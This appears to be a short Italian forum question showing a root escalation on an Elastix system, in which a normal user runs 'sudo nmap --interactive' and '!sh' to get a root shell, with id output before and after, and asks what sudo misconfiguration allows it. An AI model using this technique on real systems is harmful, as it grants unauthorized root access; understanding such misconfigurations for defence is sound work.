Ecco una vulnerabilità di escalation di privilegi su Elastix:
# id
# uid=100(name) gid=101(name)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Come può un utente normale avviare nmap con privilegio sudo? Che cosa esattamente non è configurato correttamente qui?
Fonte: link